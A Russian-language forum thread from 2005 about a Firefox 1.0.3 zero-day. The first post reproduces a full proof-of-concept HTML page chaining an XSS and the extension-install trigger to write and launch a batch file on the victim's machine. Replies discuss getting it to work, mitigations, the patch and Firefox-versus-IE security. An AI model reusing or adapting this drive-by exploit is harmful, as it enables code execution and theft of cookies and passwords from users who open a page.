ктото особомозгастый сделал эксплоит
гыгы
айда все на линукс

Выделить код

Код:

// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.

<html><head><title>firefox 0day exploit</title>

<body>Click anywhere inside this page<br>
<br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are 
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].
createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\' style=\'cursor:default;\'>&nbsp;&nbsp;&nbsp;</'+'a>'" 
id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0" style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px; 
-moz-opacity:0"></iframe>


<script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
} 

var counter = 0; 
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>

баг позволяет обойти ограничения безопасноти в жс через жс триггер установки расширения
и заставить браузер съесть любой жс код

это также касается всех геко базированных программ
особенно опасно с почтовиками mozilla mail, thunderbird

источник grayhats security

в комбинацие с дыркой кэша это может быть использованио для афтоматизированного украдвания паролей
и прочей личной информации

А сколько надо тыкать мышью, что бы что-нибудь произошло?

И что должно произойти? Внизу progress bar показывает обращение и загрузку с addons.update.mozilla.org, и всё. Никакого booom.bat я не нашёл.

ну мрям таки разбежались рабочий эксплоит выдавать :mad:

Внизу progress bar показывает обращение и загрузку с addons.update.mozilla.org, и всё.

Обидно, у меня даже этого нет. :(  Что я делаю не так? :)

FUBAr
А ты у себя проверял? Работает?

Psilon
Удали разрывы строк в <iframe> ... </iframe>

Update (08.05.2005) - The Mozilla Foundation patched (partially) this
issue on the server side by adding random letters and numbers to the
install function, which will prevent this exploit from working.

http://www.frsirt.com/exploits/20050507.firefox0day.php
Bug 293302 - Firefox 1.0.3 Critical Vulnerability
http://it.slashdot.org/article.pl?sid=05/05/08/135217&from=rss

workaround: disable "tools/options/web-Features/>Allow web sites to install software"

Выключите: Разрешать сайтам устанавливать программное обеспечение.

Тогда эксплоит не будет работать. Это временный обходной путь.

А эксплойт позволяет загружать XPI со всех сайтов или только из моего белого списка?

Не знаю, у меня экслоит не заработал вообще (из аттачмента на багзилле). Но на всякий случай я выключил сабж моего прошлого поста.

FUBAr, слишком много грамматических ошибок и флуда. бан на 2 дня.
немного остынь и вперед к новым подвигам. :)

gass512 пишет

Не знаю, у меня экслоит не заработал вообще (из аттачмента на багзилле). Но на всякий случай я выключил сабж моего прошлого поста.

K_Mikhail пишет

Интересно, кто перешлёт этот код антивирусникам DrWeb и KAV, если он (код) неработающий? Я бы, всё-таки, хотел знать, как заставить его работать, т.к. иначе антивирусники его не примут.

Убирал разрывы между строками - всё равно не работает.

Из бага 293302:

> the exploit does not work actually
Chris Thomas (CTho):
We took some steps on the update.mozilla.org side to mitigate the problem.

Да, по-моему поторопился народ. В транке работает, а в 1.0.х что-то работать не хочет.

To protect yourself against all of these holes, disable JavaScript. (Some people have suggested only disabling software installation. If you only disable software installation, you will still be vulnerable to the XSS hole used in the exploit. XSS is sufficient for stealing cookies, saved passwords, intranet web pages, etc.)

Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает.
Надо отключать JavaScript.

Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает.
Надо отключать JavaScript.

Не путай две разных уязвимости.

От уязвимости, связанной с внедрением джаваскрипта в иконку в диалоге: хотите ли установить это расширение? спасает отключение "Разрешать сайтам устанавливать программное обеспечение". А от второй уязвимости, связаной с XSS, спасает отключение JavaScrpt.

gass512 пишет

Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает.
Надо отключать JavaScript.

Не путай две разных уязвимости.

От уязвимости, связанной с внедрением джаваскрипта в иконку в диалоге: хотите ли установить это расширение? спасает отключение "Разрешать сайтам устанавливать программное обеспечение". А от второй уязвимости, связаной с XSS, спасает отключение JavaScrpt.

О чём можно вообще говорить, если код неработоспособен. Пытаюсь под FF 1.0.2 запустить - не работает.

Да у меня в 1.0.3 тоже не работает. Но люди говорят, у кого-то работает значит.

gass512 пишет

Да у меня в 1.0.3 тоже не работает. Но люди говорят, у кого-то работает значит.

Кое-что в коде я поправил при помощи Инспектора DCOM и консоли JavaScript. А учитывая то, что я вообще не знаю никакого программирования - то процесс этот был весьма длительным. Сейчас пытаюсь остальное поправить. Как поправлю - отправлю нашим производителям антивирусов. Хотелось бы всё-таки, чтобы ещё кто-нибудь, кроме меня, попытался привести код в порядок. Тогда дело быстрее пойдёт.

А зачем это разработчикам антивирусов отправлять? Выйдет 1.0.4 на днях, дык и все, приехал поезд.

В сегодняшней nightly дыры уже исправлены, кстати.

Да! Как только не изголялись в обвинениях в дырявости IE. А у самих - те же самые проблемы. Не стыдно?

безопасность продукта это не только его не пробиваемость, но и оперативность латания дыр :)
и стыдиться тут совершенно нечего.

ХЕ-ХЕ!
одно дело - найти уязвимость, а другое - испльзовать.
фф еще никто реально не ломал. ну, то есть, чтобы куча юзеров с фф подцепила вирь, с кредиток пропало 100000$ и т.д... а с IE - на каждом шагую пормнится, год назад полез в инет с IE. через пол  часа - вирь на компе. серьезно.

Да! Как только не изголялись в обвинениях в дырявости IE. А у самих - те же самые проблемы. Не стыдно?

Проблемы у IE не в наличии дыр, а в "оперативности" их закрытия, где по полгода-году зияют такие дыры, что ведро со свистом пролетает, и никто не чешется, только юзвери страдают.

Ты просто неправильно понимаешь термин "безопасность".

Unghost пишет

В сегодняшней nightly дыры уже исправлены, кстати.

Кстати, никто не поделится ссылочкой на исправленную версию? (в смысле стабильной ветки 1.0.х), можно будет и потестировать, и душа спокойней будет :)

зы кстати, во многих не Mozilla`вских сборках Firefox (в том же MDK) эта "дыра" вообщен не работает.

Asa сейчас сказал на IRC:

[10.05.2005 22:06] <Asa> 1.0.4 is gonna roll out in the next 12-24 hours (hopefully)
[10.05.2005 22:06] <Asa> we're in the testing phase now.

gass512 пишет

Да! Как только не изголялись в обвинениях в дырявости IE. А у самих - те же самые проблемы. Не стыдно?

Проблемы у IE не в наличии дыр, а в "оперативности" их закрытия, где по полгода-году зияют такие дыры, что ведро со свистом пролетает, и никто не чешется, только юзвери страдают.

Ты просто неправильно понимаешь термин "безопасность".

Я понимаю термин "безопасность" как отсутствие проблем с пометкой "critical" и возможность наложения т.н. hot_security_patch в случае нахождения каких-то дыр. Здесь я ничего такого не вижу. Приходится ждать очередной версии и пытаться по dail-up обновить продукт. Судя по вашим словам, безопасность - это только оперативное реагирование. Как бы не так! ИМХО, если уж FF позиционируется как "безопасный" по сравнению с IE, то эту самую безопасность нужно обеспечивать не только "неподдержкой" VBS и ActiveX. А FF, опять же ИМХО, серьёзно "ломанут". Просто FF ещё не так распространён, как IE, и т.н. "талантливые ребята" ещё не принимались всерьез за Лису. Но 3 прецедента уже есть. Так что попытайтесь их в какой-то мере опередить. :)

понимаю термин "безопасность" как отсутствие проблем с пометкой "critical" и возможность наложения т.н. hot_security_patch в случае нахождения каких-то дыр.

В версии 1.1 будут маленькие бинарные хотпатчи, не будет необходимости качать весь дистр. А я все равно качать буду, ибо складирую софт, который юзаю, на резервном винте.

ИМХО, если уж FF позиционируется как "безопасный" по сравнению с IE, то эту самую безопасность нужно обеспечивать не только "неподдержкой" VBS и ActiveX.

А чем еще, кроме как не оперативным закрытием уязвимостей? Или Вы знаете браузер, написанный богами, в котором нет ни одной уязвимости? По секрету Вам скажу -- такого в природе не существует :) Ни один программист, даже самый талантливый, не может написать идеальный код.

Просто FF ещё не так распространён, как IE, и т.н. "талантливые ребята" ещё не принимались всерьез за Лису.

По популярности он давно его обскакал (не по usage share).

Но 3 прецедента уже есть.

Что, где? Покажите мне эти 3 уязвимости. Кто от них пострадал? Вы? Дядя Ваш? Что-то я их не вижу, неужели они уже сто лет как пропатчены? :) BTW секьюрити-эксперты, которые ищут уязвимости, сообщают об этом прямо на багзиллу, а не как в случае с IE -- трезвонят на всех углах, ведь все равно MS сначала упорно будет молчать, делая вид, что никакой дырки нет, а через год спохватится патч сделать, когда всех юзеров IE поимеют троянами, да и то, помню легендарную историю, как они одну дырку три раза патчили.

Так что, где проблемы с безопаснсотью? Я пока что вижу безопасный браузер.
Чем больше дыр находят, тем лучше, ибо меньше остается.

поддерживаю gass512 да уязвимости есть были и будут всегда, но реально их во-превых очень быстро закрывают (а с выходом 1.1 еще думаю быстрее будет) а во-вторых, стех пор как я слез с ИЕ ( а это случилось с выходом версии firefox 0.8.x) мой антивирус не находит никогда ни одного виря в кэше, что очень часто было с ИЕ, и кто же безопаснее? тем более сколько я не смотрел уязвимости написаные для Firefox они почему то не работали...и в третьих не видел ниодного своего знакомого на Firefox пострадавшего где то от spyware и иже с ними ( не говоря уже об эксплоитах), зато от ИЕшников постоянно вижу вопли и крики, сопровождающиеся обильным post'отделением.

Тестовые сборки Firefox 1.0.4 можно найти в каталоге http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-aviary1.0.1-l10n/

Если кто протестирует сборку под Linux буду очень благодарен.

По секрету Вам скажу -- такого в природе не существует smile Ни один программист, даже самый талантливый, не может написать идеальный код.

hello world пока единственная подобная прога=)

hello world пока единственная подобная прога=)

И то, если будет написана в машинных кодах :) А то вдруг в компиляторе ошибка и т.д. и т.п.